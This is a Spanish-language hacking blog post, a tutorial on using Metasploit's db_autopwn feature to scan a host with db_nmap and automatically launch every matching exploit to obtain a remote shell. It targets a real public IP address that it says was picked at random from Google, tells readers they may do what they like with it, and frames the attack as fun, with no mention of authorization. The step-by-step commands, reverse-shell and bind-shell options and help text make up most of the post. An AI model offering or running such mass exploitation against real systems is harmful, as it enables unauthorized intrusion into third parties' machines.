Metasploit Framework !!! Auto Shell =)
Buenas a todos los parceros =)
Bueno alguno de ustedes puede que ya conozcan el framework de metasploit y para los que no conozcan esta tool, les explicare =)
El framework de metasploit es una suite de exploits y de herramientas de seguridad informatica, es una suite perfecta para las pruebas de pentest y para juackear un rato xD
Bueno vamos a comenzar !!!
Una vez instalado el framework en el equipo vamos a realizar una actualizacion al framework. Para realizar eso utilizaremos el comando msfupdate.

Una vez muestre la revision, significa que ya esta actualizado completamente =)
Ahora entraremos en la consola de comandos del metasploit ejecutando msfconsole.

Una vez adentro vamos a activar el plugin de sqlite el cual nos permitira crear la base de datos para realizar un autoataque ;) asi que para hacer eso escribiremos: db_driver sqlite3

Listo =)
Una vez cargado el driver vamos a crear una base de datos para que se guarde toda la info, para ello ejecutaremos: db_create hack1

hack1 lo pueden cambiar por cualquier otro nombre...Listo !! =p
Creada la base de datos procedemos a realizar el scanneo con nmap y a guardarlo en la base de datos =) para eso ejecutamos: db_nmap -sS -sV -PN 67.228.192.227

recuerden 67.228.192.227 se cambia por la ip que quieren scannear, esta ip es escogida al azar de google asi q pueden hacer lo q quieran con ella xD
Bueno una vez scanneado el host, el resultado se guarda automaticamente en la base de datos creada anteriormente. Ahora vamos a coger los exploits de cada puerto y los vamos a probar todos =) aunque eso no lo hacemos nosotros se hara automaticamente con la opcion db_autopwn y cuando salga la shell simplemente nos dara el acceso. Bonito cierto ?? =)
Bueno para hacer eso ejecutaremos: db_autopwn -p -e -t -s -r -b

Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
Ya con esto solo nos queda esperar la shell =) Facilito cierto ?? jeje
Gracias a los de metasploit por esta gran tool y espero les guste el tuto =)
Atentamente,
Checho
Project-Ric Staff
HackBeerWii Event
No hay comentarios:
Publicar un comentario